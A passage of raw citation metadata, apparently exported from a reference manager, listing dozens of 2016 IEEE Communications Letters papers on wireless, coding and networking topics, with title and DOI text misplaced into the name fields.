https://doi.org/10.1109/LCOMM.2015.2506576","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Vakilian, V., &amp; Mehrpouyan","given":"H. (2016). High-Rate and Low-Complexity Space-Time Block Codes for &lt;inline-formula&gt; &lt;img src=“/images/tex/24701.gif” alt=“2 \\times 2”&gt; &lt;/inline-formula&gt; MIMO Systems. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2545651","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Chergui, H., Benjillali, M., &amp; Saoudi","given":"S. (2016). Performance Analysis of Project-and-Forward Relaying in Mixed MIMO-Pinhole and Rayleigh Dual-Hop Channel. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2514348","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Hu, P. H., Tseng, P. H., Guo, Y. Y., &amp; Wei","given":"C. C. (2016). Distributed Transmit Beamforming Algorithms for Unsynchronized OFDM Systems With Timing Offset. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2587774","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Chen, L., Han, S., Meng, W., Li, C., &amp; Berhane","given":"M. (2016). Power Allocation for Single-Stream Dual-Hop Full-Duplex Decode-and-Forward MIMO Relay. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2525777","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Li, X., Huang, S., Yin, S., Zhou, Y., Zhang, M., Zhao, Y., … Gu","given":"W. (2016). Design of K-Node (Edge) Content Connected Optical Data Center Networks. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2517646","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Xu, H., Govindasamy, K., &amp; Pillay","given":"N. (2016). Uncoded Space-Time Labeling Diversity. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2580503","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Wei, L., Zhou, B., Ma, X., Chen, D., Zhang, J., Peng, J., … Chen","given":"L. (2016). Lightning: A High-Efficient Neighbor Discovery Protocol for Low Duty Cycle WSNs. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2536018","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Gurugopinath, S., Muralishankar, R., &amp; Shankar","given":"H. N. (2016). Differential Entropy-Driven Spectrum Sensing Under Generalized Gaussian Noise. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2564968","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Ding, Q., Sun, B., &amp; Zhang","given":"X. (2016). A Traffic-Light-Aware Routing Protocol Based on Street Connectivity for Urban Vehicular Ad Hoc Networks. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2574708","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Debbabi, I., Gal, B. L., Khouja, N., Tlili, F., &amp; Jego","given":"C. (2016). Fast Converging ADMM-Penalized Algorithm for LDPC Decoding. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2531040","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Hou, W., Lu, S., &amp; Cheng","given":"J. (2016). Spatially Coupled Repeater-Combiner-Convolutional Codes. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2015.2497242","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Jang, H. S., Kim, S. M., Park, H. S., &amp; Sung","given":"D. K. (2016). Message-Embedded Random Access for Cellular M2M Communications. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2546878","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Zhao, L., &amp; Zheng","given":"K. (2016). Cooperative Energy Broadcasting System With Massive MIMO. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2557800","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Jeon, S. Y., Ahn, J. H., &amp; Lee","given":"T. J. (2016). Reliable Broadcast Using Limited LT Coding in Wireless Networks. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2548465","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Mu, X., Shen, C., &amp; Bai","given":"B. (2016). A Combined Algebraic- and Graph-Based Method for Constructing Structured RC-LDPC Codes. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2558152","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Bouk, S. H., Ahmed, S. H., Yaqub, M. A., Kim, D., &amp; Gerla","given":"M. (2016). DPEL: Dynamic PIT Entry Lifetime in Vehicular Named Data Networks. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2015.2508798","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Wan, C., Han, Y., Sheng, W., Tian, B., &amp; Yang","given":"H. (2016). Multibeam Pattern Synthesis With Adaptive Finite Excitation Amplitude Levels. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2015.2513042","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Santipach, W., Mamat, K., &amp; Charoenlarpnopparut","given":"C. (2016). Outage Bound for Max-Based Downlink Scheduling With Imperfect CSIT and Delay Constraint. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2581159","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Jia, Y., Zhao, M., &amp; Zhou","given":"W. (2016). Joint User Association and eICIC for Max&amp;#x2013;Min Fairness in HetNets. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2516002","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Guo, C., Liao, B., Huang, L., Lin, X., &amp; Zhang","given":"J. (2016). On Convexity of Fairness-Aware Energy-Efficient Power Allocation in Spectrum-Sharing Networks. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2015.2509995","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Shafie, A. El, Niyato, D., &amp; Al-Dhahir","given":"N. (2016). Artificial-Noise-Aided Secure MIMO Full-Duplex Relay Channels With Fixed-Power Transmissions. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2579623","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Gomaa, A., Jalloul, L. M. A., Mansour, M. M., Gomadam, K., &amp; Tujkovic","given":"D. (2016). Max-Log-MAP Optimal MU-MIMO Receiver for Joint Data Detection and Interferer Modulation Classification. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2552514","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Khosravi, S., Asvadi, R., &amp; Ahmadian-Attari","given":"M. (2016). An Efficient Algorithm to Improve the Success Threshold of Node-Based Verification-Based Algorithms in Compressed Sensing. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2569579","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Chakraborty, A., S., V. B., &amp; Manoj","given":"B. S. (2016). Analytical Identification of Anchor Nodes in a Small-World Network. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2554117","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Deng, H., Wang, H. M., Wang, W., &amp; Lee","given":"M. H. (2016). Dual User Selection for Security Enhancement in Uplink Multiuser Systems. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2585125","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Wen, D., &amp; Yu","given":"G. (2016). Time-Division Cellular Networks With Full-Duplex Base Stations. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2015.2512865","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Ozger, M., &amp; Akan","given":"O. B. (2016). On the Utilization of Spectrum Opportunity in Cognitive Radio Networks. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2015.2504103","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Xu, H., &amp; Bai","given":"B. (2016). Superposition Construction of &lt;inline-formula&gt; &lt;img src=“/images/tex/18865.gif” alt=“Q”&gt; &lt;/inline-formula&gt;-Ary LDPC Codes by Jointly Optimizing Girth and Number of Shortest Cycles. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Gou, L., Zhang, G., Bian, Z., Bian, D., &amp; Xie","given":"Z. (2016). Minimizing Completion Time for Relay-Assisted Multicast With Instantly Decodable Network Coding. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2518163","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Aslan, M., &amp; Matrawy","given":"A. (2016). On the Impact of Network State Collection on the Performance of SDN Applications. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2015.2496955","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Esfahani, A., Mantas, G., &amp; Rodriguez","given":"J. (2016). An Efficient Null Space-Based Homomorphic MAC Scheme Against Tag Pollution Attacks in RLNC. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2547420","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Du, Y., Dong, B., Chen, Z., Fang, J., &amp; Yang","given":"L. (2016). Shuffled Multiuser Detection Schemes for Uplink Sparse Code Multiple Access Systems. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2551742","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Merwaday, A., G&amp;#x00FC;ven&amp;#x00E7;, &amp;#x0130;, Saad, W., Mehbodniya, A., &amp; Adachi","given":"F. (2016). Sojourn Time-Based Velocity Estimation in Small Cell Poisson Networks. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2015.2501822","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Jeong, S., Kim, H. S., Yoon, S. G., &amp; Bahk","given":"S. (2016). Q-BT: Queue-Based Burst Transmission Over an Asynchronous Duty-Cycle MAC Protocol. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2525978","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Kang, I.-W., Shin, J.-W., &amp; Kim, H.-N. (2016). Low-Complexity LLR Calculation for Gray-Coded PAM Modulation. IEEE Communications Letters, 20(4)","given":"688–691. https://doi.org/10.1109/LCOMM.2016.2532880","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Ayoubi, S., Assi, C., Narayanan, L., &amp; Shaban","given":"K. (2016). Optimal Polynomial Time Algorithm for Restoring Multicast Cloud Services. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2571691","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Muhammad, A., Fiorani, M., Wosinska, L., &amp; Chen","given":"J. (2016). Joint Optimization of Resource Allocation for Elastic Optical Intra-Datacenter Network. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2576460","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Wang, J., Xu, Y., Zhang, D., &amp; Xu","given":"K. (2016). Feedback Fusion for LFNCR in Wireless Broadcasting With Massive Receivers. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2521366","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Prochazka","given":"P. (2016). Nonbinary Channel Coded Physical Layer Network Coding Over Modulo-Sum Algebraic Ring Structures. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2015.2512600","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Mohamad, A., Visoz, R., &amp; Berthet","given":"A. O. (2016). Cooperative Incremental Redundancy Hybrid Automatic Repeat Request Strategies for Multi-Source Multi-Relay Wireless Networks. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2590538","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Molu, M. M., Cumanan, K., &amp; Burr","given":"A. (2016). Low-Complexity Compute-and-Forward Techniques for Multisource Multirelay Networks. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2537810","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Falsafain, H., &amp; Mousavi","given":"S. R. (2016). Exhaustive Enumeration of Elementary Trapping Sets of an Arbitrary Tanner Graph. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2587860","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Ren, H., Liu, N., &amp; Pan","given":"C. (2016). Energy Efficient Transmission for Multicast Services in MISO Distributed Antenna Systems. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2529619","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Molina, E., Jacob, E., Toledo, N., &amp; Astarloa","given":"A. (2016). Performance Enhancement of High-Availability Seamless Redundancy (HSR) Networks Using OpenFlow. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2015.2504442","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Upadhyay, P. K., &amp; Sharma","given":"P. K. (2016). Max-Max User-Relay Selection Scheme in Multiuser and Multirelay Hybrid Satellite-Terrestrial Relay Systems. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2015.2502599","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Sohn, I., Lee, J. H., &amp; Lee","given":"S. H. (2016). Low-Energy Adaptive Clustering Hierarchy Using Affinity Propagation for Wireless Sensor Networks. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2517017","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Afana, A., Mesleh, R., Ikki, S., &amp; Atawi","given":"I. E. (2016). Performance of Quadrature Spatial Modulation in Amplify-and-Forward Cooperative Relaying. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2015.2509975","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Etesami, O., &amp; Gohari","given":"A. (2016). Maximal Rank Correlation. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2015.2501287","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Tahir, M., &amp; Mazher","given":"K. (2016). Singular Spectrum Based Smoothing of GNSS Pseudorange Dynamics. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2579624","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Wang, B., Dai, L., Mir, T., &amp; Wang","given":"Z. (2016). Joint User Activity and Data Detection Based on Structured Compressive Sensing for NOMA. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2560180","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Wu, L., &amp; Zhang","given":"W. (2016). Caching-Based Scalable Video Transmission Over Cellular Networks. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2555298","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Zakaria, R., &amp; Ruyet","given":"D. Le. (2016). Theoretical Analysis of the Power Spectral Density for FFT-FBMC Signals. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2588497","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Saini, R., Mishra, D., &amp; De","given":"S. (2016). OFDMA-Based DF Secure Cooperative Communication With Untrusted Users. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2521655","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Liang, X., Liu, A., Pan, X., Zhang, Q., &amp; Chen","given":"F. (2016). A New and Accurate Estimator With Analytical Expression for Frequency Estimation. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2015.2496149","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Zhao, L., Choi, S. I., &amp; Chung","given":"S. Y. (2016). Polar Code Design for Noisy Blackwell Channels. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2578318","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Chatterjee, B. C., &amp; Oki","given":"E. (2016). Dispersion-Adaptive First&amp;#x2013;Last Fit Spectrum Allocation Scheme for Elastic Optical Networks. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2526998","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Wu, C., Liu, Z., Wang, X., Jiang, W., &amp; Ru, X. (2016). Single-Channel Blind Source Separation of Co-Frequency Overlapped GMSK Signals Under Constant-Modulus Constraints. IEEE Communications Letters, 20(3)","given":"486–489. https://doi.org/10.1109/LCOMM.2016.2521737","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Zhang, T., Huang, Y., Cai, Y., &amp; Yang","given":"W. (2016). Secure Transmission in Spectrum Sharing Relaying Networks With Multiple Antennas. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2537329","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Zhu","given":"B. (2016). Rethinking Fractional Repetition Codes: New Construction and Code Distance. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2015.2512871","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Seo, J. B., &amp; Kim","given":"S. Y. (2016). Profit Versus Energy Efficiency Maximization in Regular Topology Cellular Networks. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2575007","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Talvitie, J., Renfors, M., &amp; Lohan","given":"E. S. (2016). Novel Indoor Positioning Mechanism Via Spectral Compression. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2015.2504097","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Li, C., He, C., Jiang, L., &amp; Liu","given":"F. (2016). Robust Beamforming Design for Max&amp;#x2013;Min SINR in MIMO Interference Channels. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2522430","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Killi, B. P. R., &amp; Rao","given":"S. V. (2016). Optimal Model for Failure Foresight Capacitated Controller Placement in Software-Defined Networks. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2550026","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Lee, S. H., &amp; Khisti","given":"A. (2016). The Gaussian Diamond-Wiretap Channel With Conferencing Relays. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2558145","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Wang, X., Cheng, H., &amp; Yao","given":"Y. (2016). Addressing With an Improved DAD for 6LoWPAN. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2015.2499250","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Alevizos, P. N., &amp; Bletsas","given":"A. (2016). Network Localization Cram&amp;#x00E9;r&amp;#x2013;Rao Bounds for General Measurement Models. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2585491","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Miliotis, V., Alonso, L., &amp; Verikoukis","given":"C. (2016). Resource Allocation Techniques for Heterogeneous Networks Under User Misbehavior. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2543702","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Deng, R., He, J., Chen, Q., Chen, M., Liu, Y., Liu, J., &amp; Chen","given":"L. (2016). A Serial IFFT Precoding Scheme to Mitigate the Periodic Noise in OFDM System. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2557798","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Sharma, P. K., &amp; Upadhyay","given":"P. K. (2016). Cognitive Relaying With Transceiver Hardware Impairments Under Interference Constraints. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2533500","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Rugini, L. (2016). Symbol Error Probability of Hexagonal QAM. IEEE Communications Letters, 20(8)","given":"1523–1526. https://doi.org/10.1109/LCOMM.2016.2574343","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Swetha, N., Sastry, P. N., Rao, Y. R., &amp; Sabat","given":"S. L. (2016). Fast Sequency-Ordered Complex Hadamard Transform-Based Parzen Window Entropy Detection for Spectrum Sensing in Cognitive Radio Networks. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2548466","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Li, S., Xu, W., Liu, Z., &amp; Lin","given":"J. (2016). Independent Power Splitting for Interference-Corrupted SIMO SWIPT Systems. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2519408","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Yang, L., Jiang, H., Vorobyov, S. A., Chen, J., &amp; Zhang","given":"H. (2016). Secure Communications in Underlay Cognitive Radio Networks: User Scheduling and Performance Analysis. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2549011","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Seo","given":"J. B. (2016). Game-Theoretic Queue-Stabilizing Backoff Algorithm in S-ALOHA and CSMA Systems. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2582488","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Hsu, H., &amp; Chen","given":"K. C. (2016). A Resource Allocation Perspective on Caching to Achieve Low Latency. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2015.2499193","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Wang, C., Cui, G., &amp; Wang, W. (2016). Dual-Stream Transceiver Structure With Single Antenna for Phase-Modulated OFDM. IEEE Communications Letters, 20(9)","given":"1756–1759. https://doi.org/10.1109/LCOMM.2016.2591014","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Siddiq, A. I. (2016). Low Complexity OFDM-IM Detector by Encoding All Possible Subcarrier Activation Patterns. IEEE Communications Letters, 20(3)","given":"446–449. https://doi.org/10.1109/LCOMM.2015.2514278","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Liu, K., Yan, J., Lu, J., &amp; Chen","given":"X. (2016). Predictive Unicast and Multicast Scheduling in Onboard Buffered Crossbar Switches. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2514493","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Li, Z., Wang, W., Xie, W., Wang, M., &amp; Li","given":"Y. (2016). An Efficient Two-Step Power Allocation Method for OFDM-Based Two-Way Full-Duplex Links. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2567419","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Pham, C., Tran, N. H., Do, C. T., Huh, E. N., &amp; Hong","given":"C. S. (2016). Joint Consolidation and Service-Aware Load Balancing for Datacenters. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2015.2501402","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Meng, X., Wu, S., Kuang, L., Huang, D., &amp; Lu","given":"J. (2016). Multi-User Detection for Spatial Modulation via Structured Approximate Message Passing. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2577627","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Fr&amp;#x00E9;in","given":"R. (2016). Source Separation Approach to Video Quality Prediction in Computer Networks. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2563418","non-dropping-particle":"de","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Magalh&amp;#x00E3;es, F. G., Priti, R., Nikdast, M., Hessel, F., Liboiron-Ladouceur, O., &amp; Nicolescu","given":"G. (2016). Design and Modelling of a Low-Latency Centralized Controller for Optical Integrated Networks. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2515583","non-dropping-particle":"de","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Chen, Y. M., Lin, C. F., &amp; Ueng","given":"Y. L. (2016). An LDPC-Coded Generalized Space Shift Keying Scheme Using A Codebook-Assisted Low-Complexity Massive MIMO Detector. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2518180","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Park, D., Kim, M., &amp; Cho, D.-H. (2016). Novel Single-RF MIMO System Based on Repetitive Pulse Width Modulation. IEEE Communications Letters, 20(1)","given":"165–168. https://doi.org/10.1109/LCOMM.2015.2496171","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Mai, V. V, Kim, J., Jeon, S. W., Choi, S. W., Seo, B., &amp; Shin","given":"W. Y. (2016). Degrees of Freedom of Millimeter Wave Full-Duplex Systems With Partial CSIT. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2536606","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Lv, Z., &amp; Li","given":"Y. (2016). A Channel State Information Feedback Algorithm for Massive MIMO Systems. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2557788","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Vo, T. N., Amis, K., Chonavel, T., &amp; Siohan","given":"P. (2016). A Low-Complexity Bit-Loading Algorithm for OFDM Systems Under Spectral Mask Constraint. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2521358","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Yu, F., Li, D., Wang, Z., &amp; Guo","given":"Q. (2016). Partial Update Sequential Probabilistic Integer Least Square Inter Carrier Interference Mitigation Algorithm in Mobile OFDM System. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2533484","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Kotagi, V. J., Thakur, R., Mishra, S., &amp; Murthy","given":"C. S. R. (2016). Breathe to Save Energy: Assigning Downlink Transmit Power and Resource Blocks to LTE Enabled IoT Networks. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2570224","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Chen, Q., Wang, L., Hong, S., &amp; Xiong","given":"Z. (2016). Performance Improvement of JSCC Scheme Through Redesigning Channel Code. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2554543","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Kralevska, K., Gligoroski, D., &amp; &amp;#x00D8;verby","given":"H. (2016). General Sub-Packetized Access-Optimal Regenerating Codes. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2561287","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Le, T. N., Pegatoquet, A., Huy, T. Le, Lizzi, L., &amp; Ferrero","given":"F. (2016). Improving Energy Efficiency of Mobile WSN Using Reconfigurable Directional Antennas. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2554544","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Benedetto, F., Giunta, G., &amp; Renfors","given":"M. (2016). A Spectrum Sensing Algorithm for Constant Modulus Primary Users Signals. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2015.2500579","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Alias, M., Saxena, N., &amp; Roy","given":"A. (2016). Efficient Cell Outage Detection in 5G HetNets Using Hidden Markov Model. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2517070","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Gholami, M., &amp; Nassaj","given":"A. (2016). Row and Column Extensions of 4-Cycle Free LDPC Codes. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2015.2497299","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Sandalidis, H. G., Chatzidiamantis, N. D., &amp; Karagiannidis","given":"G. K. (2016). A Tractable Model for Turbulence- and Misalignment-Induced Fading in Optical Wireless Systems. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2584612","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Haroun, A., Nour, C. A., Arzel, M., &amp; Jego","given":"C. (2016). Low-Complexity Soft Detection of QAM Demapper for a MIMO System. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2525722","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Hou, H., Shum, K. W., &amp; Li","given":"H. (2016). On the MDS Condition of Blaum&amp;#x2013;Bruck&amp;#x2013;Vardy Codes With Large Number Parity Columns. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2530721","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Azmat, F., Chen, Y., &amp; Stocks, N. (2016). Predictive Modelling of RF Energy for Wireless Powered Communications. IEEE Communications Letters, 20(1)","given":"173–176. https://doi.org/10.1109/LCOMM.2015.2497306","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Luo, E., Liu, Q., &amp; Wang","given":"G. (2016). Hierarchical Multi-Authority and Attribute-Based Encryption Friend Discovery Scheme in Mobile Social Networks. IEEE 